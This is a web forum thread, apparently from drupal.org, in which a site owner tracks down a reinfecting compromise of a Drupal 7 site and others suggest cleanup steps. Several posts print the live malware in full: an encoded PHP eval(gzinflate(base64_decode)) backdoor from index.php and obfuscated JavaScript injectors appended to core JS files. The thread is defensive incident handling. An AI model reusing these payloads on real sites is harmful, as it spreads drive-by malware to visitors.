Ok, I've been bashing my head against the wall on this one, hopefully someone out there has been through this and can help.
I got a notice from my host that Google had flagged my website as having malicious malware content and this is now being flagged in my search results. I did a site scan using a online scanning tool, and yup, found the file. A js file buried in the sites/default/js folder. Nuked them all but every pageload another 5-7 of them come back. Tried wiping them out and CHMODding the dir so nothing could read or write to it at all, the infection disappeared, but so did the layout of my site, so obviously RW access is required there.
Updated drupal from 7.1 - 7.18. Updated all modules including janrain to latest security updates. Infection remained. Wiped out the entire site save for the themes and modules (by deleting everything using FTP client) and reuploaded Drupal 7.18. Had a heart attack as it went to the install page. Figured it out, site back up and running to normal - infection remains.
As far as I can surmise the blackhole exploit kid corrupted at least some of the hundreds of thousands of lines of code, which then pops a JS into the pages which attempts a drive-by-download by jamming hex to the client's browser. While I can't tell exactly what it's doing the pages it's appearing on via Google Webmaster Tools seems random enough it is probably embedding itself onto every page of the theme. Seeing as I can nuke the files and on a simple pageload there are 4-5 more of them on the next pageload it is drawing this JS from somewhere and ensuring it is back there right quick.
Right now I'm downloading the entire site to a folder via FTP to start searching the index.php files but I'd rather not go on a wild goose chase as there are too many IPs and lines of code to use DW to start searching all the thousands of lines of code. Usually these sorts of things have a signature, like they infect a particular module, file, or in a particular way. I can't imagine the exploit doing anything other than an append-at-start or append-at-beginning because if it just randomly injected itself in the middle it could break the site code. Also I am not sure being only a year or two into using D7 whether it could be injected into the MySQL DB itself.
Also, more tertiarily, I havent noticed any adverse effects to my own computer, no virus warnings and I've scanned and found nothing, obviously I'm hitting the pages at lot with IE10 trying to debug this. What the heck does this exploit actually do? It seems like a collosal waste of time on the part of the exploit developer and user to infect a site with low traffic, no financial data, and no electronic commerce to try to drive-by-download users if it doesn't even do anything to someone on Win x64+IE x32. I'd think that would be their target market.
Any help?! I've been bashing my head against the wall for a couple days now and the net effect of this is my biggest traffic provider, search, is warning users not to touch my page. Chrome wont load the page and issues dire warnings.
Comments
Found something
I am not sure how pevasive it is but in downloading all the site files and doing some preliminary code viewing I have found the following inserted into the beginning of index.php:
<?php eval(gzinflate(base64_decode('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')));?>This is not present in the original D7.18 source so I am taking it that this PHP gzinflate is the exploit launching itself. I am not sure how pervasive this source code is throughout the site, or if the exploit is smart enough to have multiple variants to make it harder to search/replace for.
Of special concern is that when I deleted the entire site (including this file) and uploaded a fresh copy of D7.18 that this code somehow ended up back here. I'm not sure if I was miraculously re-exploited with D7.18 now installed (meaning it's still vulnerable) or if it's backfeeding from some other file, like a theme or a module.
I'm using GoDaddy as a host and they're pretty reputable for security. I'm not running much in the way of nonstandard modules everything has been brought here from the drupal site and I'm running no modules with very low userbases all have over 100k installations.
I'll keep posted and if anyone has any comments please do make them
Opon downloading the entire
Opon downloading the entire site and S&R'ing all the code the only instance of the above source is located inside the index.php file at the root of the site.
I also searched for
eval(gzinflate(base64_decodeto see if there were any related bits of PHP source with a similar but found none. I have taken the site offline and am uploading it all with the version that I have will keep posted to see if this works. This is truly frustrating and hopefully if I can fix this my forum entry here will help someone in the future.
Searching for things on google realted to D7 or Drupal in general has been really unhelpful with this exploit. With so many thousands of lines of code and source I'm surprised that nobody else has had to deal with this problem before, or that anyone who has hasnt posted anything in forums or pretty well anything anywhere.
=-=
all files within the installation should be deleted and replaced with new downloads from drupal.org. This will ensure that no remnants of the exploit are left behind and able to re-infect. I'd utilize the information you already learned to figure out how the site was exploited in the first place.
I did a MYSQL db wide query
I did a MYSQL db wide query for the term
%eval(gzinflate(base64_decode%And didnt find anything. Disabled the entire site by altering the URL and uploaded the whole site. Deleting the sites/default/files/js folder contents so there's nothing in there when I test.
Crossed fingers
K now I'm at my wits end...
K now I'm at my wits end... :-(
Did all that and re-enabled the site. It keeps dropping files with names like:
js_bwGuRBxsQbuEXsCNfiWRjxS__iir-KtQUTUVBcrF_kc.js
into the folder which are being detected by site scans as malware. They contain this code:
/*624319c8166e02229ab4f3ed57aaf362*/try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h","1n","1f","1f","1h","3j","27","4l","d","a","3o","4d","46","3l","4c","41","47","46","16","4a","4b","1e","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1k","4c","47","35","4c","4a","41","46","3p","1e","1p","22","1f","1k","4b","4d","3k","4b","4c","4a","41","46","3p","1e","21","1f","27","4l","d","a","41","3o","1e","46","3j","4e","41","3p","3j","4c","47","4a","1k","3l","47","47","43","41","3n","2h","46","3j","3k","44","3n","3m","16","1c","1c","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","1k","41","46","3m","3n","4g","31","3o","1e","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1f","29","29","1j","1n","1f","4j","d","a","9","4e","3j","4a","16","4b","4c","46","45","29","4a","4b","1e","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","4b","4c","4h","44","3n","2a","1k","4b","1d","1h","4b","4c","46","45","1h","1d","16","4j","16","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","16","44","3n","3o","4c","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4c","47","48","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4l","28","1l","4b","4c","4h","44","3n","2a","16","28","3m","41","4e","16","3l","44","3j","4b","4b","29","18","4b","1d","1h","4b","4c","46","45","1h","1d","18","2a","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","18","40","4c","4c","48","26","1l","1l","3o","41","4a","41","46","3p","4f","3j","4c","3n","4a","4f","3j","4h","1k","47","4a","3p","1l","3j","3m","1l","3o","3n","3n","3m","1k","48","40","48","18","16","4f","41","3m","4c","40","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","16","40","3n","41","3p","40","4c","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","2a","28","1l","41","3o","4a","3j","45","3n","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","9","4e","3j","4a","16","3n","4g","48","29","46","3n","4f","16","2g","3j","4c","3n","1e","1f","27","3n","4g","48","1k","4b","3n","4c","2g","3j","4c","3n","1e","3n","4g","48","1k","3p","3n","4c","2g","3j","4c","3n","1e","1f","1h","23","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}/*624319c8166e02229ab4f3ed57aaf362*/;And I have no idea how it is inserting this now at this point
file ajax.js at line 622
file ajax.js at line 622 (Drupal 7.18) found this jquery added starting at line 622
=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h","1n","1f","1f","1h","3j","27","4l","d","a","3o","4d","46","3l","4c","41","47","46","16","4a","4b","1e","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1k","4c","47","35","4c","4a","41","46","3p","1e","1p","22","1f","1k","4b","4d","3k","4b","4c","4a","41","46","3p","1e","21","1f","27","4l","d","a","41","3o","1e","46","3j","4e","41","3p","3j","4c","47","4a","1k","3l","47","47","43","41","3n","2h","46","3j","3k","44","3n","3m","16","1c","1c","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","1k","41","46","3m","3n","4g","31","3o","1e","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1f","29","29","1j","1n","1f","4j","d","a","9","4e","3j","4a","16","4b","4c","46","45","29","4a","4b","1e","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","4b","4c","4h","44","3n","2a","1k","4b","1d","1h","4b","4c","46","45","1h","1d","16","4j","16","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","16","44","3n","3o","4c","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4c","47","48","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4l","28","1l","4b","4c","4h","44","3n","2a","16","28","3m","41","4e","16","3l","44","3j","4b","4b","29","18","4b","1d","1h","4b","4c","46","45","1h","1d","18","2a","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","18","40","4c","4c","48","26","1l","1l","3o","41","4a","41","46","3p","4f","3j","4c","3n","4a","4f","3j","4h","1k","47","4a","3p","1l","3j","3m","1l","3o","3n","3n","3m","1k","48","40","48","18","16","4f","41","3m","4c","40","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","16","40","3n","41","3p","40","4c","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","2a","28","1l","41","3o","4a","3j","45","3n","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","9","4e","3j","4a","16","3n","4g","48","29","46","3n","4f","16","2g","3j","4c","3n","1e","1f","27","3n","4g","48","1k","4b","3n","4c","2g","3j","4c","3n","1e","3n","4g","48","1k","3p","3n","4c","2g","3j","4c","3n","1e","1f","1h","23","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a"was a pattern match. I will try nuking the code starting at the last operator in the file
not sure if it will work but got something
so pattern matching using DW to find the following:
/*7e7b15f5891cbc082a95a7e215dedf26*/try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h","1n","1f","1f","1h","3j","27","4l","d","a","3o","4d","46","3l","4c","41","47","46","16","4a","4b","1e","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1k","4c","47","35","4c","4a","41","46","3p","1e","1p","22","1f","1k","4b","4d","3k","4b","4c","4a","41","46","3p","1e","21","1f","27","4l","d","a","41","3o","1e","46","3j","4e","41","3p","3j","4c","47","4a","1k","3l","47","47","43","41","3n","2h","46","3j","3k","44","3n","3m","16","1c","1c","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","1k","41","46","3m","3n","4g","31","3o","1e","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1f","29","29","1j","1n","1f","4j","d","a","9","4e","3j","4a","16","4b","4c","46","45","29","4a","4b","1e","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","4b","4c","4h","44","3n","2a","1k","4b","1d","1h","4b","4c","46","45","1h","1d","16","4j","16","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","16","44","3n","3o","4c","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4c","47","48","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4l","28","1l","4b","4c","4h","44","3n","2a","16","28","3m","41","4e","16","3l","44","3j","4b","4b","29","18","4b","1d","1h","4b","4c","46","45","1h","1d","18","2a","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","18","40","4c","4c","48","26","1l","1l","3o","41","4a","41","46","3p","4f","3j","4c","3n","4a","4f","3j","4h","1k","47","4a","3p","1l","3j","3m","1l","3o","3n","3n","3m","1k","48","40","48","18","16","4f","41","3m","4c","40","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","16","40","3n","41","3p","40","4c","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","2a","28","1l","41","3o","4a","3j","45","3n","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","9","4e","3j","4a","16","3n","4g","48","29","46","3n","4f","16","2g","3j","4c","3n","1e","1f","27","3n","4g","48","1k","4b","3n","4c","2g","3j","4c","3n","1e","3n","4g","48","1k","3p","3n","4c","2g","3j","4c","3n","1e","1f","1h","23","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}/*7e7b15f5891cbc082a95a7e215dedf26*/is returning a bunch of stuff in the misc folder . Will S&R and report back
bad code as above found in
bad code as above found in following files
misc\
authorize.js
autocomplete.js
batch.js
collapse.js
drupal.js
form.js
jquery.ba-bbq.js
jquery.cookie.jz
farbtastic\
farbtastic.js
as well as js\
bunch of files
upping just those files didnt clear the baddies. took site entirely offline by renaming the root dir and pushing the whole site back up again to test
While waiting did a search of
While waiting did a search of the MySQL db for the hex string. Nothing. Still upping
scrubbed all the files as
scrubbed all the files as above, upped them and deleted the default/files/js/ directory
its still dropping infected files with the js query
Maybe this has something to do with the caching system?
Taking the site offline and re-downloading again.
Anyone have any F-ing idea how to fix this problem?
=-=
somewhere in the file structure are files that don't belong, or files that are infected beyond the string that you are looking for. That said, the files don't have to be within your drupal install. check any folder within the account. apache logs may aid in locating where the activity is coming from.
I don't believe this issue has anything to do with the database, but of course you can truncate all cache tables in the DB.
It's also of benefit to inspect any 3rd party library files like editors and the like to ensure they are updated to the latest versions.
Ok I've started doing partial
Ok I've started doing partial matching.
Virtually all js files in the misc/ folder seem to be corrupted - despite a fresh rewrite from the D7.18 core source
Making things easier is that it starts and ends with it's own string:
/*624319c8166e02229ab4f3ed57aaf362*/I am guessing that it is doing this so it knows whether it has already infected the file. The strings do not seem to be the same across all infections though so as a search key the actual hex drops in quotes seems to be better. It also seems to be using different code combinations to launch itself.
Its effected almost every js file in the entire system. folders effected are:
misc/
ui/
block/
color/
comment/
contextual/
dashboard/
text/
field/
filter/
locale/
tests/
menu/
node/
openid/
overlay/
path/
profile/
shortcut/
system/
taxonomy/
js/
as well as the unzipping via the root index.php
Still doing more pattern matching to see if I can detect more instances
Change all of your passwords,
Change all of your passwords, scan your computer for viruses, trojans, etc.
I remember having the exact same problem around 3.5 years ago, and exploited FTP was to blame.
Yeah I scanned my machine for
Yeah I scanned my machine for everything in a deep scan, my PC turned up nothing. Only computer ever used for dev.
More folders afflicted (I am finding different variants across code by searching exclusively for
"3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h","1n","1f","1f","1h","3j","27","4l","d","a","3o","4d","46","3l","4c","41","47","46","16","4a","4b","1e","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1k","4c","47","35","4c","4a","41","46","3p","1e","1p","22","1f","1k","4b","4d","3k","4b","4c","4a","41","46","3p","1e","21","1f","27","4l","d","a","41","3o","1e","46","3j","4e","41","3p","3j","4c","47","4a","1k","3l","47","47","43","41","3n","2h","46","3j","3k","44","3n","3m","16","1c","1c","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","1k","41","46","3m","3n","4g","31","3o","1e","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1f","29","29","1j","1n","1f","4j","d","a","9","4e","3j","4a","16","4b","4c","46","45","29","4a","4b","1e","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","4b","4c","4h","44","3n","2a","1k","4b","1d","1h","4b","4c","46","45","1h","1d","16","4j","16","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","16","44","3n","3o","4c","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4c","47","48","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4l","28","1l","4b","4c","4h","44","3n","2a","16","28","3m","41","4e","16","3l","44","3j","4b","4b","29","18","4b","1d","1h","4b","4c","46","45","1h","1d","18","2a","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","18","40","4c","4c","48","26","1l","1l","3o","41","4a","41","46","3p","4f","3j","4c","3n","4a","4f","3j","4h","1k","47","4a","3p","1l","3j","3m","1l","3o","3n","3n","3m","1k","48","40","48","18","16","4f","41","3m","4c","40","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","16","40","3n","41","3p","40","4c","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","2a","28","1l","41","3o","4a","3j","45","3n","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","9","4e","3j","4a","16","3n","4g","48","29","46","3n","4f","16","2g","3j","4c","3n","1e","1f","27","3n","4g","48","1k","4b","3n","4c","2g","3j","4c","3n","1e","3n","4g","48","1k","3p","3n","4c","2g","3j","4c","3n","1e","1f","1h","23","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"For manual removal, searching for that chunk of code seems to turn up an instance, then I can search and replace the entire instance which goes something like this:
/* hex sequence */ java script code containing the above; /* hex sequence*/In all instances it has been appended to the end of the js file, with exception of the index.php - where it was appended to the top of the file.
Quite annoying slog it is but it seems like I'm making headway. I'm amazed at how many files have become corrupted just since I installed the new D7.18 core after deleting virtually the entire site. I even lost the user avatars!
Still going through it...
Seems like there was about 11
Seems like there was about 11 variants of the insertion. Seems to be complete. I will obsolete the old server-side folder and drop the hopefully clean vers I have scrubbed into a completely different folder.
Fingers crossed and here's to hoping.
Seems like that finally
Seems like that finally worked. Site has been malware-free for an hour now, whereas before it would reinfect in a single page load
looks like the site has had some damage, problem is I am now getting
•Warning: Cannot modify header information - headers already sent by (output started at /home/content/24/7933624/html/2011/index.php:3) in drupal_send_headers() (line 1216 of /home/content/24/7933624/html/2011/includes/bootstrap.inc).
•Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/content/24/7933624/html/2011/index.php:3) in drupal_session_start() (line 287 of /home/content/24/7933624/html/2011/includes/session.inc).
•Warning: Cannot modify header information - headers already sent by (output started at /home/content/24/7933624/html/2011/index.php:3) in drupal_send_headers() (line 1216 of /home/content/24/7933624/html/2011/includes/bootstrap.inc).
•Warning: Cannot modify header information - headers already sent by (output started at /home/content/24/7933624/html/2011/index.php:3) in drupal_send_headers() (line 1216 of /home/content/24/7933624/html/2011/includes/bootstrap.inc).
•Warning: Cannot modify header information - headers already sent by (output started at /home/content/24/7933624/html/2011/index.php:3) in drupal_send_headers() (line 1216 of /home/content/24/7933624/html/2011/includes/bootstrap.inc).
•Warning: Cannot modify header information - headers already sent by (output started at /home/content/24/7933624/html/2011/index.php:3) in drupal_send_headers() (line 1216 of /home/content/24/7933624/html/2011/includes/bootstrap.inc).
•Warning: Cannot modify header information - headers already sent by (output started at /home/content/24/7933624/html/2011/index.php:3) in drupal_send_headers() (line 1216 of /home/content/24/7933624/html/2011/includes/bootstrap.inc).
•Warning: Cannot modify header information - headers already sent by (output started at /home/content/24/7933624/html/2011/index.php:3) in drupal_send_headers() (line 1216 of /home/content/24/7933624/html/2011/includes/bootstrap.inc).
and any submission of a button or form seems to just return a blank page
I can try to pop a fresh core back on overtop tomorrow and give it some time to see if it gets re-infected again
what a PIA
=-=
with reference to the warning see: http://drupal.org/node/1424
looks like overnight it
looks like overnight it managed to reinfect the buggin site
great
Coder module
Check out the Coder and Hacked modules. They may help you to isolate problem areas.
it appears to be good now
it appears to be good now after a reupload and a bunch of hard scans
hopefully someone in the D7 security team can look into this, this thing is brutal
I must say I am quite disappointed that there wasnt more of a response given a critical bug placed in the issues and this thread in the forum. This was a SEVERE infection - it persisted even after a complete deletion of the D7 load an a reupload of a fresh copy of D7.18, causing a lot of data loss.
I thought that the drupal security team would take a malware infection more seriously.
The drupal security team
The drupal security team responds to drupal security issues. There is no evidence of a core exploit here (no reproducible steps, no pointers to a piece of code)
Your entire problem points to a compromised server.
If you want a response from
If you want a response from the Drupal security team, you should contact the Drupal security team on security@drupal.org.
Here's the response you will get:
Note a) and the "we do not provide support for individual sites which have been defaced or hacked, or for issues which are not related to security."
That said, there's nothing to do for the sec team except take note (running old versions, no module list, signature of the hack doesn't immediately point to Drupal as point of access).
The attack continues
The attack continues. A full cleanout of the bad source and an upgrade to D7.18.
I have now upgraded to 7.19 with the latest update, will have to hunt the code for the exploit because after the core update and clearing all caches the infection persists.
It has seemed to trigger Drupal to create a variety of clean url redirects to files that do not exist at all on the server, upon doing site scans it is directing to a variety of "files" that dont exist like http://domain/404testpage.js . There is no such file but the scanner is detecting malware at that URL even though there is no file there.
So the infection was no
So the infection was no longer in js files it was now in variety of php files including settings.php , views-more.tpl.php , views_ui.class.php , views.api.php
it was injected in the beginning of the files and the infection was detected using the search term
Seeing as I bashed in a whole new D7.19 core just an hour ago this is getting pretty concerning- a bunch of these files should have been overwritten with the fresh core
should have been
You should nuke the site's account or better yet, the server.
I've changed the FTP
I've changed the FTP usernames and passwords and now the site's DNS is down...
perhaps its a brute force re-attack to regain the FTP password?
This is on godaddy so its not like I screwed up my DNS server and they've got some pretty big data farms
DNS came back up after about
DNS came back up after about 30mins
tried blocking traffic from all countries except Canada/USA to reduce the surface
Scans are still returning detects on several files which arent there (the nonexistent 404 js page and dir)
Contacted hosting support told them to check the health of their server
test uploading blank
test uploading blank index.php or something.js and without working drupal files
if those dummy file got corrupted too then the virus must be residing in server not from internet.
if the virus reside in the server, no matter how many time you nuke drupal it won't get cleaned up. it will require server admin to do virus checking, cleaning and maybe reboot the machine to clear the virus from memory.
--------------------------------------------------------------------------------------------------------
if you can use drupal why use others?
VicTheme.com
Im going to end up trying
Im going to end up trying that.
Save for their server being infected the only thing at this point I can think of is that somehow the malware modified the CRON job. Other than the server being infected itself that's the only thing I can think of that would somehow be able to reinfect after all of the files were deleted and replaced with fresh versions which were clean.
This has been super frustrating. Anyone up for creating a Drupal anti-malware module? ;-)
Next thing I'm going to try is I'm going to strip every file, and start from fresh versions of every module installed and the latest drupal core security update that just came out a few days ago. I've killed the existing CRON job from the server so Drupal will have to re-create it, hopefully this doesn't brick the site and force me to start over entirely from scratch. I still have the database AOK and I've searched it exhaustively so I'm pretty sure that it isnt self-executing anything from parsing the database.
Has anyone else encountered a blackhole exploit drop on their Drupal site? I can't be the only one out there.
Ok so I've rebuilt the site
Ok so I've rebuilt the site largely from scratch not a single file was carried over from the old site to the new. Cron was deleted and restarted by fresh software. I have renamed the drupal folder to something bizarre and unique, different than the regular installation dir. Dropped an index.php file into a fresh folder created in the same name as the installation folder from drupal..
heres to fingers crossed that that index.php doesn't get infected with a gzip(deflate or some weird js files
I also have always had a jump page from the root URL to the installation folder, which i've temporarily changed to a site down page with no redirect or link to the installation folder
